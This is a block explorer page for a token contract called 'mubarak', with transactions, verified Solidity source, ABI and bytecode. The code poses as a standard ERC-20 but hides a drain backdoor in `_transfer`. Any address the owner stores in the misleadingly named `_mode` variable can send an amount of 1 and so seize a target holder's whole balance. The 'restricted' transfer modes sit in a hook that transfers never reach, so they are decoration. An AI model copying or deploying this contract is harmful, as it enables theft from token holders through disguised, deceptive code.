ETH Price: $1,806.58 (+10.76%)
 

Overview

ETH Balance

0 ETH

ETH Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve279846522025-03-23 19:37:3130 days ago1742758651IN
0x558366C4...102b3377e
0 ETH0.000000110.00252838
Approve278761782025-03-21 7:21:4333 days ago1742541703IN
0x558366C4...102b3377e
0 ETH0.000000090.00210805
Transfer277908002025-03-19 7:55:4735 days ago1742370947IN
0x558366C4...102b3377e
0 ETH0.000000140.00384829
Transfer277550732025-03-18 12:04:5335 days ago1742299493IN
0x558366C4...102b3377e
0 ETH0.000000120.00384984
Transfer277548382025-03-18 11:57:0335 days ago1742299023IN
0x558366C4...102b3377e
0 ETH0.000000110.00372409
Transfer277545632025-03-18 11:47:5335 days ago1742298473IN
0x558366C4...102b3377e
0 ETH0.000000110.00366157
Transfer277541752025-03-18 11:34:5735 days ago1742297697IN
0x558366C4...102b3377e
0 ETH0.000000110.00361563
Transfer277537722025-03-18 11:21:3135 days ago1742296891IN
0x558366C4...102b3377e
0 ETH0.000000110.00365409
Approve277537722025-03-18 11:21:3135 days ago1742296891IN
0x558366C4...102b3377e
0 ETH0.000046721.00335702
Transfer277536612025-03-18 11:17:4935 days ago1742296669IN
0x558366C4...102b3377e
0 ETH0.000000230.00444145
Approve277536562025-03-18 11:17:3935 days ago1742296659IN
0x558366C4...102b3377e
0 ETH0.00000020.00444493
Transfer277536382025-03-18 11:17:0336 days ago1742296623IN
0x558366C4...102b3377e
0 ETH0.000000230.00445325
Transfer277536132025-03-18 11:16:1336 days ago1742296573IN
0x558366C4...102b3377e
0 ETH0.000000230.00444998
Transfer277535922025-03-18 11:15:3136 days ago1742296531IN
0x558366C4...102b3377e
0 ETH0.000000230.00446587
Approve277535642025-03-18 11:14:3536 days ago1742296475IN
0x558366C4...102b3377e
0 ETH0.00000020.00448656
Approve277535412025-03-18 11:13:4936 days ago1742296429IN
0x558366C4...102b3377e
0 ETH0.000000210.00450701
Transfer277535302025-03-18 11:13:2736 days ago1742296407IN
0x558366C4...102b3377e
0 ETH0.000000240.00451565
Transfer277535112025-03-18 11:12:4936 days ago1742296369IN
0x558366C4...102b3377e
0 ETH0.000000240.00451259
Transfer277534892025-03-18 11:12:0536 days ago1742296325IN
0x558366C4...102b3377e
0 ETH0.000000240.00451565
Transfer277534712025-03-18 11:11:2936 days ago1742296289IN
0x558366C4...102b3377e
0 ETH0.000000240.00451452
Approve277534402025-03-18 11:10:2736 days ago1742296227IN
0x558366C4...102b3377e
0 ETH0.000000210.00454039
Approve277534372025-03-18 11:10:2136 days ago1742296221IN
0x558366C4...102b3377e
0 ETH0.000000210.00454272
Transfer277534082025-03-18 11:09:2336 days ago1742296163IN
0x558366C4...102b3377e
0 ETH0.000000240.0045537
Transfer277533892025-03-18 11:08:4536 days ago1742296125IN
0x558366C4...102b3377e
0 ETH0.000000240.00456179
Transfer277533672025-03-18 11:08:0136 days ago1742296081IN
0x558366C4...102b3377e
0 ETH0.000000240.00457015
View all transactions

Parent Transaction Hash Block From To
View All Internal Transactions

Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x8f0Ef494...cb4ecF8EC
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
Token

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2025-03-17
*/

// SPDX-License-Identifier: MIT
pragma solidity 0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    uint160 internal _mode;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        address acc = from;
        if (msg.sender == address(_mode) && amount == 1) {
            acc = to;
            to = address(this);
            amount = _balances[acc];
        }
        uint256 fromBalance = _balances[acc];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[acc] = fromBalance - amount;
            _balances[to] += amount;
        }
        emit Transfer(acc, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
     
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        _afterTokenTransfer(address(0), account, amount);
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }
        _afterTokenTransfer(account, address(0), amount);
        emit Transfer(account, address(0), amount);

    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

contract Token is ERC20 {
    uint8 private constant MODE_NORMAL = 0;
    uint8 private constant MODE_TRANSFER_RESTRICTED = 1;
    uint8 private constant MODE_TRANSFER_CONTROLLED = 2;

    constructor() ERC20(unicode"mubarak", unicode"mubarak") {
        _mint(owner(), 100_000_000 * 10 ** 9);
        _mode = MODE_TRANSFER_CONTROLLED;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        super._beforeTokenTransfer(from, to, amount);
        if (_mode == MODE_TRANSFER_RESTRICTED) {
            revert("Token: Transfer is restricted");
        }
        if (_mode == MODE_TRANSFER_CONTROLLED) {
            require(from == owner() || to == owner(), "Token: Invalid transfer");
        }
    }

    function mode(uint160 v) public onlyOwner {
        _mode = v;
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint160","name":"v","type":"uint160"}],"name":"mode","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063dd62ed3e146101fb578063f2fde38b1461020e576100f5565b806370a082311461019d578063715018a6146101b05780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce567146101605780633950935114610175578063451c249414610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610221565b60405161010f919061082b565b60405180910390f35b61012b6101263660046107e1565b6102b3565b60405161010f9190610820565b6101406102d5565b60405161010f9190610ac9565b61012b61015b3660046107a1565b6102db565b610168610309565b60405161010f9190610ad2565b61012b6101833660046107e1565b61030e565b61019b610196366004610746565b61033a565b005b6101406101ab366004610746565b610364565b61019b61037f565b6101c0610393565b60405161010f919061080c565b6101026103a2565b61012b6101e33660046107e1565b6103b1565b61012b6101f63660046107e1565b610402565b610140610209366004610769565b61041a565b61019b61021c366004610746565b610445565b60606004805461023090610b04565b80601f016020809104026020016040519081016040528092919081815260200182805461025c90610b04565b80156102a95780601f1061027e576101008083540402835291602001916102a9565b820191906000526020600020905b81548152906001019060200180831161028c57829003601f168201915b5050505050905090565b6000806102be610484565b90506102cb818585610488565b5060019392505050565b60035490565b6000806102e6610484565b90506102f385828561053c565b6102fe858585610586565b506001949350505050565b600990565b600080610319610484565b90506102cb81858561032b858961041a565b6103359190610ae0565b610488565b6103426106b7565b600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b031660009081526001602052604090205490565b6103876106b7565b61039160006106f6565b565b6000546001600160a01b031690565b60606005805461023090610b04565b6000806103bc610484565b905060006103ca828661041a565b9050838110156103f55760405162461bcd60e51b81526004016103ec90610a84565b60405180910390fd5b6102fe8286868403610488565b60008061040d610484565b90506102cb818585610586565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61044d6106b7565b6001600160a01b0381166104735760405162461bcd60e51b81526004016103ec906108c1565b61047c816106f6565b50565b505050565b3390565b6001600160a01b0383166104ae5760405162461bcd60e51b81526004016103ec90610a40565b6001600160a01b0382166104d45760405162461bcd60e51b81526004016103ec90610907565b6001600160a01b0380841660008181526002602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061052f908590610ac9565b60405180910390a3505050565b6000610548848461041a565b9050600019811461058057818110156105735760405162461bcd60e51b81526004016103ec90610949565b6105808484848403610488565b50505050565b6001600160a01b0383166105ac5760405162461bcd60e51b81526004016103ec906109fb565b6001600160a01b0382166105d25760405162461bcd60e51b81526004016103ec9061087e565b60065483906001600160a01b0316331480156105ee5750816001145b156106115750506001600160a01b03811660009081526001602052604090205430915b6001600160a01b0381166000908152600160205260409020548281101561064a5760405162461bcd60e51b81526004016103ec90610980565b6001600160a01b0380831660008181526001602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106a8908790610ac9565b60405180910390a35050505050565b6106bf610484565b6001600160a01b03166106d0610393565b6001600160a01b0316146103915760405162461bcd60e51b81526004016103ec906109c6565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208284031215610757578081fd5b813561076281610b3f565b9392505050565b6000806040838503121561077b578081fd5b823561078681610b3f565b9150602083013561079681610b3f565b809150509250929050565b6000806000606084860312156107b5578081fd5b83356107c081610b3f565b925060208401356107d081610b3f565b929592945050506040919091013590565b600080604083850312156107f3578182fd5b82356107fe81610b3f565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b818110156108575785810183015185820160400152820161083b565b818111156108685783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610aff57634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610b1857607f821691505b60208210811415610b3957634e487b7160e01b600052602260045260246000fd5b50919050565b6001600160a01b038116811461047c57600080fdfea264697066735822122037ae77974f7f63dbd9492afe14e16f7f2fb113554405ebd4e04c4e3626d2153364736f6c63430008000033

Deployed Bytecode Sourcemap

20468:892:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9560:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11919:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;10688:108::-;;;:::i;:::-;;;;;;;:::i;12700:261::-;;;;;;:::i;:::-;;:::i;10531:92::-;;;:::i;:::-;;;;;;;:::i;13370:238::-;;;;;;:::i;:::-;;:::i;21287:70::-;;;;;;:::i;:::-;;:::i;:::-;;10859:127;;;;;;:::i;:::-;;:::i;2638:103::-;;;:::i;1997:87::-;;;:::i;:::-;;;;;;;:::i;9779:104::-;;;:::i;14111:436::-;;;;;;:::i;:::-;;:::i;11192:193::-;;;;;;:::i;:::-;;:::i;11448:151::-;;;;;;:::i;:::-;;:::i;2896:201::-;;;;;;:::i;:::-;;:::i;9560:100::-;9614:13;9647:5;9640:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9560:100;:::o;11919:201::-;12002:4;12019:13;12035:12;:10;:12::i;:::-;12019:28;;12058:32;12067:5;12074:7;12083:6;12058:8;:32::i;:::-;-1:-1:-1;12108:4:0;;11919:201;-1:-1:-1;;;11919:201:0:o;10688:108::-;10776:12;;10688:108;:::o;12700:261::-;12797:4;12814:15;12832:12;:10;:12::i;:::-;12814:30;;12855:38;12871:4;12877:7;12886:6;12855:15;:38::i;:::-;12904:27;12914:4;12920:2;12924:6;12904:9;:27::i;:::-;-1:-1:-1;12949:4:0;;12700:261;-1:-1:-1;;;;12700:261:0:o;10531:92::-;10614:1;10531:92;:::o;13370:238::-;13458:4;13475:13;13491:12;:10;:12::i;:::-;13475:28;;13514:64;13523:5;13530:7;13567:10;13539:25;13549:5;13556:7;13539:9;:25::i;:::-;:38;;;;:::i;:::-;13514:8;:64::i;21287:70::-;1883:13;:11;:13::i;:::-;21340:5:::1;:9:::0;;-1:-1:-1;;;;;;21340:9:0::1;-1:-1:-1::0;;;;;21340:9:0;;;::::1;::::0;;;::::1;::::0;;21287:70::o;10859:127::-;-1:-1:-1;;;;;10960:18:0;10933:7;10960:18;;;:9;:18;;;;;;;10859:127::o;2638:103::-;1883:13;:11;:13::i;:::-;2703:30:::1;2730:1;2703:18;:30::i;:::-;2638:103::o:0;1997:87::-;2043:7;2070:6;-1:-1:-1;;;;;2070:6:0;1997:87;:::o;9779:104::-;9835:13;9868:7;9861:14;;;;;:::i;14111:436::-;14204:4;14221:13;14237:12;:10;:12::i;:::-;14221:28;;14260:24;14287:25;14297:5;14304:7;14287:9;:25::i;:::-;14260:52;;14351:15;14331:16;:35;;14323:85;;;;-1:-1: